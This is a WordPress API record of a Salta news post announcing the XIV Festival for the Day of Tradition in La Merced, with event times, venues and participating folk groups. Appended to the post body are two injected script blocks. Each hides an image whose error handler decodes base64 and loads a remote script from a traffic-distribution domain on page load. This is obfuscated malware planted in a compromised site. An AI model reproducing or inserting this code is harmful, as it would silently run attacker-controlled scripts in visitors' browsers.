{"id":3265,"date":"2023-11-09T11:18:41","date_gmt":"2023-11-09T14:18:41","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3265"},"modified":"2025-08-14T00:05:45","modified_gmt":"2025-08-14T03:05:45","slug":"xiv-festival-por-el-dia-de-la-tradicion-la-merced-le-baila-y-canta-al-pais","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3265","title":{"rendered":"XIV Festival por el D\u00eda de la Tradici\u00f3n: La Merced le baila y canta al pa\u00eds"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#980b31\"><em>Este viernes 10 y s\u00e1bado 11 de noviembre a partir de las 18 se realizar\u00e1n diversas actividades en ocasi\u00f3n del D\u00eda de la Tradici\u00f3n en Salta y La Merced. el XIV Festival por el d\u00eda de la Tradici\u00f3n<\/em><\/h4>\n\n\n\n<p>En ocasi\u00f3n de un nuevo aniversario del poeta Jos\u00e9 Hern\u00e1ndez, uno de los exponentes m\u00e1s representativos de las letras argentinas y autor de \u201cEl Gaucho Mart\u00edn Fierro\u201d, obra cumbre de la literatura nacional, nuestro pa\u00eds celebra el D\u00eda de la Tradici\u00f3n.<\/p>\n\n\n\n<p>Es por ello, que los festejos en La Merced iniciar\u00e1n con el Festival \u201cSalta le baila y le canta al pa\u00eds\u201d en Capital, uniendo en un festival para toda la familia a provincias del Noroeste Argentino y pa\u00edses del MERCOSUR, pa\u00edses que comparten ra\u00edces y cultura como La Rioja, Chaco, Santiago del Estero, Paraguay, Chile y Uruguay. Tambi\u00e9n participar\u00e1n conjuntos musicales y academias folkl\u00f3ricas de toda la provincia.<\/p>\n\n\n\n<p>La velada comenzar\u00e1 a las 18:30&nbsp;y tendr\u00e1 lugar en el Parque Sur Salta, ubicado en Av. Ex Combatientes de Malvinas en Salta, Capital. Las presentaciones se realizar\u00e1n hasta las 22, efectu\u00e1ndose entre ellas la Elecci\u00f3n de la Paisana 2023.<\/p>\n\n\n\n<p>Finalmente, durante el s\u00e1bado 11 de noviembre, se realizar\u00e1 el tradicional desfile de fortines gauchos por distintas calles de La Merced, que desembocar\u00e1 en el baile de integraci\u00f3n a realizarse a las 18:45 en el Complejo Municipal de La Merced, previo a la inauguraci\u00f3n oficial del Festival por la Tradici\u00f3n. El espect\u00e1culo contar\u00e1 con la participaci\u00f3n de grupos y academias folkl\u00f3ricas de La Rioja, Chaco, Santiago del Estero, Paraguay, Chile y Uruguay, como as\u00ed tambi\u00e9n del Valle de Lerma y Salta Capital.&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Este viernes 10 y s\u00e1bado 11 de noviembre a partir de las 18 se realizar\u00e1n diversas actividades en ocasi\u00f3n del D\u00eda de la Tradici\u00f3n en Salta y La Merced. el XIV Festival por el d\u00eda de la Tradici\u00f3n En ocasi\u00f3n de un nuevo aniversario del poeta Jos\u00e9 Hern\u00e1ndez, uno de los exponentes m\u00e1s representativos de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3266,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,11,13],"tags":[],"class_list":{"0":"post-3265","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-datos-utiles","9":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3265"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3265"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3265\/revisions"}],"predecessor-version":[{"id":6925,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3265\/revisions\/6925"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3266"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3265"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3265"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3265"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}